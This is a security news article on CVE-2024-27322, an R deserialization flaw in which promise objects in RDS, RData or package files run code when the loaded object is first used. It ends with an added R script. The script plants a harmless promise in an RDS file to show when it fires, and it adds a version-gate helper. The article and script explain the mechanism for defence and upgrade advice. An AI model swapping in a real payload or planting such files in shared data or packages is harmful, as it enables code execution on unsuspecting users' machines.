High-Severity R Flaw (CVE-2024-27322) Puts Users at Risk

A high-severity vulnerability has been discovered in the R programming language, potentially exposing organizations that use this popular open-source language to software supply chain attacks.

The vulnerability, designated CVE-2024-27322, has been rated 8.8 out of 10 on the CVSS scale, which is high severity rather than critical. The issue lies in R's deserialization process, the step that turns a stored byte representation of objects back into live R objects for use within a program. In R that representation is the language's own serialization format (binary by default, with an ASCII variant), read by readRDS(), load() and unserialize(); the flaw is in that native format, not in JSON or XML handling.

readRDS Exploited

R is extensively used for statistical computing and graphics, and is particularly favored in sectors such as financial services, healthcare, scientific research and government, and in data-intensive fields such as artificial intelligence and machine learning.

Researchers from HiddenLayer identified a flaw in R’s deserialization process that allows an attacker to execute arbitrary code in the victim’s environment using a specially crafted RDS file. RDS files are commonly used to store R objects for later use or sharing, and the same serialization format underlies .RData files and the lazy-load databases (.rdb/.rdx) from which installed R packages are loaded, so a malicious package can carry the same payload as a malicious data file.

This vulnerability involves two R concepts: “lazy evaluation” and “promise objects.” Lazy evaluation means that R does not compute an expression until its value is actually needed. A promise object is the mechanism behind this: it pairs an unevaluated expression with the environment it should be evaluated in. R creates a promise for every function argument and evaluates it only when the argument is first used, and code can create one explicitly with delayedAssign().

An attacker exploits this by crafting an RDS file whose serialized content contains a promise object with an attacker-chosen expression. R's serialization format can carry promises, and a vulnerable unserialize() rebuilds them as promises. Reading the file itself runs nothing; the embedded code executes the first time the deserialized value is referenced, for example when the user assigns the result of readRDS() to a variable and then does anything with that variable, or when a package built from such files is loaded.

Because the payload can travel inside ordinary data files and packages, the vulnerability could affect thousands of users through an attack on the open-source software supply chain for R packages, particularly given that hubs such as R-Forge and Bioconductor are used by many developers to distribute and obtain code.

After HiddenLayer reported the issue to the R developers, it was addressed in R 4.4.0, released in April 2024. Organizations using R should upgrade to R 4.4.0 or later. Until that is done, .rds and .RData files from untrusted sources, and packages from unvetted repositories, should be treated as executable code: the payload does not fire when the file is read but the first time the object is used, so merely opening a file to inspect it is not safe on an unpatched R.
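The following is an added example, not code from the article or from HiddenLayer's write-up. It illustrates both the promise mechanism described above and the upgrade advice: it builds an RDS file containing a promise using only R's own tools (delayedAssign() plus saveRDS()), shows that nothing runs while the file is written or read, and that the deferred expression runs only when the restored symbol is referenced. The payload is harmless and only records when it ran. The variable name promise_forced_at and the helper read_rds_untrusted() are assumptions introduced for illustration; they are not R APIs. On R 4.4.0 or later the observed stage may differ, since that release changed how promises in serialized streams are handled, so the script prints which stage, if any, forced the promise.

```r
## Added example (not the article's or HiddenLayer's code): a promise carried
## through R's serialization format, observed at each stage.

rds_path <- tempfile(fileext = ".rds")

## Hypothetical marker: set by the payload the moment it is evaluated.
promise_forced <- function() exists("promise_forced_at", envir = globalenv())

env <- new.env()
env$ordinary <- 42L
## delayedAssign() binds `marker` to an unevaluated expression, i.e. a promise.
## The expression only records that it ran; an attacker would put anything here.
delayedAssign("marker",
              {
                assign("promise_forced_at", Sys.time(), envir = globalenv())
                "payload ran"
              },
              assign.env = env)

saveRDS(env, rds_path)
cat("after saveRDS:  forced =", promise_forced(), "\n")

restored <- readRDS(rds_path)
cat("after readRDS:  forced =", promise_forced(), "\n")

## `$` on an environment forces a promise bound there, exactly like any other
## reference to the symbol.  On R before 4.4.0 this is the point at which the
## embedded code runs, with the privileges of the user reading the file.
value <- restored$marker
cat("after use:      forced =", promise_forced(), "| value =", value, "\n")

## Guard for code paths that must accept serialized objects from untrusted
## sources (assumed helper, not an R API): refuse on R versions that predate
## the fix, otherwise delegate to readRDS().  load() and unserialize() read the
## same format and need the same gate.
read_rds_untrusted <- function(path) {
  if (getRversion() < "4.4.0")
    stop("refusing to deserialize untrusted data on R ", getRversion(),
         " (CVE-2024-27322 is fixed in R >= 4.4.0)")
  readRDS(path)
}

guarded <- tryCatch(read_rds_untrusted(rds_path),
                    error = function(e) conditionMessage(e))
print(guarded)
```

Run with Rscript on a pre-4.4.0 R and the first two lines report forced = FALSE while the third reports TRUE, which is the behaviour the article describes: reading is silent, use is not. The guard is a version gate rather than a content scan; saveRDS() gzip-compresses its output by default, so a naive search of the file for the promise type code is not a substitute for running a fixed R.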